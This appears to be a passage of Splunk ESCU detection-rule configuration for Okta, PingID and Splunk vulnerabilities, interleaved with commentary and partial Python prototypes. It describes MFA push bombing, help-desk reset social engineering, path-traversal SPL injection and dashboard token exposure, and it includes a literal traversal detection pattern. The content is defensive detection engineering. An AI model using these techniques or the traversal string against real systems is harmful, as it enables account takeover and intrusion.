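    # a denied evaluation and an event without a dtHash are ignored
    _event("2024-04-01T08:20:00.000Z", "dave@example.com", "198.51.100.9", "Android", "CHROME", "Lagos", "dt-aaaa", result="DENY"),
    _event("2024-04-01T08:25:00.000Z", "dave@example.com", "198.51.100.9", "Android", "CHROME", "Lagos", None),
]
```

Only dave's token is reported. The denied Android evaluation carrying the same dtHash is dropped before grouping, which mirrors the SPL filter on outcome.result; if you want denied replays to count as well, that is the line to change, in both the search and this prototype.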
action.escu.creation_date = 2022-09-21
action.escu.modification_date = 2022-09-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta ThreatInsight Threat Detected - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Okta Account Takeover"]
action.risk = 1
action.risk.param._risk_message = The following $src_ip$ has been identified as a threat by Okta ThreatInsight. Investigate further to determine if this was authorized.
action.risk.param._risk = [{"risk_object_field": "app", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Okta ThreatInsight Threat Detected - Rule
action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `okta` eventType = security.threat.detected | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats count min(_time) as firstTime max(_time) as lastTime by app src_ip signature eventType displayMessage client.device city state country user_agent outcome.reason outcome.result severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_threatinsight_threat_detected_filter`

[ESCU - Okta Unauthorized Access to Application - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects instances where a user attempts to access an Okta application that has not been assigned to them. Such unauthorized access to applications poses a significant security risk, potentially leading to the exposure of sensitive information, disruption of services, and breaches of data protection laws. Ensuring that only authorized users have access to applications is crucial for maintaining a secure and compliant IT environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This search detects instances where a user attempts to access an Okta application that has not been assigned to them. Such unauthorized access to applications poses a significant security risk, potentially leading to the exposure of sensitive information, disruption of services, and breaches of data protection laws. Ensuring that only authorized users have access to applications is crucial for maintaining a secure and compliant IT environment.
action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments and requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553).
action.escu.known_false_positives = There is a possibility that a user may accidentally click on the wrong application, which could trigger this event. It is advisable to verify the location from which this activity originates.
action.escu.creation_date = 2024-03-07
action.escu.modification_date = 2024-03-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta Unauthorized Access to Application - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Okta Account Takeover"]
action.risk = 1
action.risk.param._risk_message = A user [$user$] is attempting to access an unauthorized application from IP Address - [$src$]
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Okta Unauthorized Access to Application - Rule
action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats values(Authentication.app) as app values(Authentication.action) as action values(Authentication.user) as user values(Authentication.reason) as reason from datamodel=Authentication where Authentication.signature=app.generic.unauth_app_access_attempt Authentication.action="failure" by _time Authentication.src Authentication.user | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | iplocation src | `okta_unauthorized_access_to_application_filter`

[ESCU - Okta User Logins from Multiple Cities - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies instances where the same user logs in from different cities within a 24-hour period, potentially indicating a compromised account. Such behavior may be indicative of an attacker attempting to gain unauthorized access to an Okta account from multiple locations. Investigating and responding to such incidents promptly is crucial to prevent account takeovers and data breaches.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1586.003"], "nist": ["DE.AE"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This search identifies instances where the same user logs in from different cities within a 24-hour period, potentially indicating a compromised account. Such behavior may be indicative of an attacker attempting to gain unauthorized access to an Okta account from multiple locations. Investigating and responding to such incidents promptly is crucial to prevent account takeovers and data breaches.
action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553).
action.escu.known_false_positives = It is uncommon for a user to log in from multiple cities simultaneously, which may indicate a false positive.
action.escu.creation_date = 2024-03-07
action.escu.modification_date = 2024-03-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta User Logins from Multiple Cities - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Okta Account Takeover"]
action.risk = 1
action.risk.param._risk_message = A user [$user$] has logged in from multiple cities [$City$] from IP Address - [$src$]. Investigate further to determine if this was authorized.
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Okta User Logins from Multiple Cities - Rule
action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1586.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Authentication.app) as app values(Authentication.action) as action values(Authentication.user) as user values(Authentication.reason) as reason values(Authentication.dest) as dest values(Authentication.signature) as signature values(Authentication.method) as method from datamodel=Authentication where Authentication.signature=user.session.start by _time Authentication.src | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | iplocation src | stats count min(_time) as firstTime max(_time) as lastTime dc(src) as distinct_src dc(City) as distinct_city values(src) as src values(City) as City values(Country) as Country values(action) as action by user | where distinct_city > 1 | `okta_user_logins_from_multiple_cities_filter`

[ESCU - Path traversal SPL injection - Rule]
action.escu = 0
action.escu.enabled = 1
description = On May 3rd, 2022, Splunk published a security advisory for a path traversal in the search parameter that can potentially allow SPL injection. An attacker can cause the application to load data from incorrect endpoints or URLs, leading to outcomes such as running arbitrary SPL queries.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = On May 3rd, 2022, Splunk published a security advisory for a path traversal in the search parameter that can potentially allow SPL injection. An attacker can cause the application to load data from incorrect endpoints or URLs, leading to outcomes such as running arbitrary SPL queries.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This search returns search UI requests carrying a path traversal parameter ("../../../../../../../../../"), which indicate exploitation attempts. This detection is meant for on-premises environments; if executed on internet-facing servers without a WAF it may produce a lot of results. This detection will not work against obfuscated path traversal requests.
action.escu.known_false_positives = This search may find additional path traversal exploitation attempts.
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Path traversal SPL injection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Path traversal exploitation attempt from $clientip$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "clientip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Path traversal SPL injection - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-26889"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = On May 3rd, 2022, Splunk published a security advisory for a path traversal in the search parameter that can potentially allow SPL injection. An attacker can cause the application to load data from incorrect endpoints or URLs, leading to outcomes such as running arbitrary SPL queries.
action.notable.param.rule_title = Path traversal SPL injection
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `path_traversal_spl_injection` | search "\/..\/..\/..\/..\/..\/..\/..\/..\/..\/" | stats count by host status clientip method uri_path uri_query | `path_traversal_spl_injection_filter`

[ESCU - PingID Mismatch Auth Source and Verification Response - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies variations between the authentication event IP address and the verification response event IP address to identify suspicious sign-in behavior. Currently this detection is configured to identify when the originating country of an authentication request differs from the verification country.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies variations between the authentication event IP address and the verification response event IP address to identify suspicious sign-in behavior. Currently this detection is configured to identify when the originating country of an authentication request differs from the verification country.
action.escu.how_to_implement = The target environment must ingest JSON logging from a PingID (PingOne) enterprise environment, either via Webhook or Push Subscription.
action.escu.known_false_positives = False positives may be generated by users working outside the geographic region where the organization's services or technology are hosted.
action.escu.creation_date = 2023-09-26
action.escu.modification_date = 2023-09-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - PingID Mismatch Auth Source and Verification Response - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Ping ID"]
action.escu.analytic_story = ["Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = An authentication by [$user$] was detected from [$dest$ - $auth_Country$] and the verification was received from [$src$ - $verify_Country$].
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "src", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "object", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PingID Mismatch Auth Source and Verification Response - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies variations between the authentication event IP address and the verification response event IP address to identify suspicious sign-in behavior. Currently this detection is configured to identify when the originating country of an authentication request differs from the verification country.
action.notable.param.rule_title = PingID Mismatch Auth Source and Verification Response
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `pingid` ("result.status" IN ("SUCCESS*","FAIL*","UNSUCCESSFUL*") NOT "result.message" IN ("*pair*","*create*","*delete*")) | eval user = upper('actors{}.name'), session_id = 'resources{}.websession', dest = 'resources{}.ipaddress', reason = 'result.message', object = 'resources{}.devicemodel', status = 'result.status' | join user session_id [ search `pingid` ("result.status" IN ("POLICY") AND "resources{}.ipaddress"=*) AND "result.message" IN("*Action: Authenticate*","*Action: Approve*","*Action: Allowed*") | rex field=result.message "IP Address: (?:N\/A)?(?<policy_ipaddress>.+)?\n" | rex field=result.message "Action: (?:N\/A)?(?<signature>.+)?\n" | rex field=result.message "Requested Application Name: (?:N\/A)?(?<Requested_Application_Name>.+)?\n" | rex field=result.message "Requested Application ID: (?:N\/A)?(?<Requested_Application_ID>.+)?\n" | eval user = upper('actors{}.name'), session_id = 'resources{}.websession', src = coalesce('resources{}.ipaddress',policy_ipaddress), app = coalesce(Requested_Application_ID,Requested_Application_Name) | fields app, user, session_id, src, signature ] | iplocation prefix=auth_ dest | iplocation prefix=verify_ src | stats count min(_time) as firstTime max(_time) as lastTime values(app) as app values(session_id) as session_id by user, dest, auth_Country, src, verify_Country, object, signature, status, reason | where auth_Country != verify_Country | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `pingid_mismatch_auth_source_and_verification_response_filter`

[ESCU - PingID Multiple Failed MFA Requests For User - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a PingID (PingOne) environment. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 10 minutes. PingID environments can be very different depending on the organization; security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls, as reported by Mandiant and others.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1621", "T1078", "T1110"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a PingID (PingOne) environment. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 10 minutes. PingID environments can be very different depending on the organization; security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls, as reported by Mandiant and others.
action.escu.how_to_implement = The target environment must ingest JSON logging from a PingID (PingOne) enterprise environment, either via Webhook or Push Subscription.
action.escu.known_false_positives = False positives may be generated by normal provisioning workflows for user device registration.
action.escu.creation_date = 2023-09-26
action.escu.modification_date = 2023-09-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - PingID Multiple Failed MFA Requests For User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Ping ID"]
action.escu.analytic_story = ["Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = Multiple Failed MFA requests $mfa_prompts$ for user $user$ between $firstTime$ and $lastTime$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PingID Multiple Failed MFA Requests For User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1621", "T1078", "T1110"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a PingID (PingOne) environment. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 10 minutes. PingID environments can be very different depending on the organization; security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls, as reported by Mandiant and others.
action.notable.param.rule_title = PingID Multiple Failed MFA Requests For User
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `pingid` "result.status" IN ("FAILURE,authFail","UNSUCCESSFUL_ATTEMPT") | eval time = _time, src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), object = 'resources{}.devicemodel', reason = 'result.message'| bucket span=10m _time | stats dc(_raw) AS mfa_prompts min(time) as firstTime, max(time) as lastTime values(src) as src by user, reason, _time | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | where mfa_prompts >= 10 | `pingid_multiple_failed_mfa_requests_for_user_filter`

[ESCU - PingID New MFA Method After Credential Reset - Rule]
action.escu = 0
action.escu.enabled = 1
description = A common social engineering technique used by threat actors is the impersonation of a valid user to organizational support staff for a password reset. During the same support call or quickly afterwards, the threat actor will request provisioning of a new MFA device. This does not require malware or phishing infrastructure and has proven to be successful in numerous historical attacks. This detection looks for the pattern of a password reset followed by MFA device provisioning.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = A common social engineering technique used by threat actors is the impersonation of a valid user to organizational support staff for a password reset. During the same support call or quickly afterwards, the threat actor will request provisioning of a new MFA device. This does not require malware or phishing infrastructure and has proven to be successful in numerous historical attacks. This detection looks for the pattern of a password reset followed by MFA device provisioning.
action.escu.how_to_implement = The target environment must ingest Windows Event Log and PingID (PingOne) data sources: specifically, logs from Active Directory Domain Controllers and JSON logging from a PingID (PingOne) enterprise environment, either via Webhook or Push Subscription.
action.escu.known_false_positives = False positives may be generated by normal provisioning workflows that generate a password reset followed by a device registration.
action.escu.creation_date = 2023-09-26
action.escu.modification_date = 2023-09-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - PingID New MFA Method After Credential Reset - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Ping ID"]
action.escu.analytic_story = ["Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = An MFA configuration change was detected for [$user$] within [$timeDiff$] of a password reset. The device [$object$] was $action$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}, {"risk_object_field": "object", "risk_object_type": "other", "risk_score": 50}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PingID New MFA Method After Credential Reset - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = A common social engineering technique used by threat actors is the impersonation of a valid user to organizational support staff for a password reset. During the same support call or quickly afterwards the threat actor will request provisioning of a new MFA device. This does not require malware or phishing infrastructure and has proven to be successful in numerous historical attacks. This detection looks for the pattern of password reset, followed by MFA device provisioning.
action.notable.param.rule_title = PingID New MFA Method After Credential Reset
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `pingid` "result.message" = "*Device Paired*" | rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)" | eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message' | eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract) | eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted") | stats count min(_time) as firstTime, max(_time) as lastTime, values(reason) as reason by src,user,action,object | join type=outer user [| search `wineventlog_security` EventID IN(4723,4724) | eval PW_Change_Time = _time, user = upper(user) | fields user,src_user,EventID,PW_Change_Time] | eval timeDiffRaw = round(lastTime - PW_Change_Time) | eval timeDiff = replace(tostring(abs(timeDiffRaw) ,"duration"),"(\d*)\+*(\d+):(\d+):(\d+)","\2 hours \3 minutes") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `security_content_ctime(PW_Change_Time)` | where timeDiffRaw > 0 AND timeDiffRaw < 3600 | `pingid_new_mfa_method_after_credential_reset_filter`

[ESCU - PingID New MFA Method Registered For User - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the registration of a new multi-factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the registration of a new multi-factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence.
action.escu.how_to_implement = The target environment must ingest JSON logging from a PingID (PingOne) enterprise environment, either via Webhook or Push Subscription.
action.escu.known_false_positives = False positives may be generated by normal provisioning workflows for user device registration.
action.escu.creation_date = 2023-09-26
action.escu.modification_date = 2023-09-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - PingID New MFA Method Registered For User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Ping ID"]
action.escu.analytic_story = ["Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = An MFA configuration change was detected for [$user$], the device [$object$] was $action$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 10}, {"risk_object_field": "src", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "object", "risk_object_type": "other", "risk_score": 10}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - PingID New MFA Method Registered For User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the registration of a new multi-factor authentication method for a PingID (PingOne) account. Adversaries who have obtained unauthorized access to a user account may register a new MFA method to maintain persistence.
action.notable.param.rule_title = PingID New MFA Method Registered For User
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `pingid` "result.message"="Device Paired*" result.status="SUCCESS" | rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)" | eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message' | eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract) | eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted") | stats count min(_time) as firstTime, max(_time) as lastTime by src,user,object,action,reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `pingid_new_mfa_method_registered_for_user_filter`

[ESCU - Splunk Absolute Path Traversal Using runshellscript - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can exploit an absolute path traversal to execute arbitrary code that is located on a separate disk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can exploit an absolute path traversal to execute arbitrary code that is located on a separate disk.
action.escu.how_to_implement = Must have access to internal indexes. Only applies to Splunk on Windows versions.
action.escu.known_false_positives = The command runshellscript can be used for benign purposes. Analysts will have to review the searches and determine maliciousness, especially by looking at the targeted script.
action.escu.creation_date = 2023-09-05
action.escu.modification_date = 2023-09-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Absolute Path Traversal Using runshellscript - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Absolute Path Traversal Using runshellscript - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2023-40597"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunk_python` *runshellscript* | eval log_split=split(_raw, "runshellscript: ") | eval array_raw = mvindex(log_split,1) | eval data_cleaned=replace(replace(replace(array_raw,"\[",""),"\]",""),"'","") | eval array_indices=split(data_cleaned,",") | eval runshellscript_args_count=mvcount(array_indices) | where runshellscript_args_count = 10 | eval interpreter=mvindex(array_indices,0) | eval targetScript=mvindex(array_indices,1) | search targetScript!="*C:*" | stats count min(_time) as firstTime max(_time) as lastTime by splunk_server interpreter targetScript | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `splunk_absolute_path_traversal_using_runshellscript_filter`

[ESCU - Splunk Account Discovery Drilldown Dashboard Disclosure - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. Splunk drilldown vulnerability disclosure in the Dashboard application that can potentially allow exposure of tokens from privileged users. An attacker can create a dashboard, share it with a privileged user (admin) and detokenize variables using external URLs within the dashboard drilldown function.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = Splunk drilldown vulnerability disclosure in the Dashboard application that can potentially allow exposure of tokens from privileged users. An attacker can create a dashboard, share it with a privileged user (admin) and detokenize variables using external URLs within the dashboard drilldown function.
action.escu.how_to_implement = This search uses the REST function to query for dashboards with environment variables present in URL options.
action.escu.known_false_positives = This search may reveal non-malicious URLs with environment variables used in organizations.
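The runshellscript detection above (Splunk Absolute Path Traversal Using runshellscript) recovers the interpreter and target script by stripping brackets and quotes from the logged argument list and splitting on commas, which shifts positions as soon as a path contains a comma or quote. The Python below is an added example, not code from the security_content repository or from Splunk: it parses constructed `splunk_python`-style lines with `ast.literal_eval`, keeps only the ten-argument form the search keys on, and reports scripts that do not live on the C: drive, grouped the way the search's stats clause groups them. The line layout, the argument order (interpreter first, target script second) and the ten-argument count are assumptions taken from the SPL, not from Splunk documentation.

```python
import ast
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed sample events in the shape the search splits on: "runshellscript: " followed by a
# Python list repr of the arguments. Hosts and paths are made up; the argument order and the
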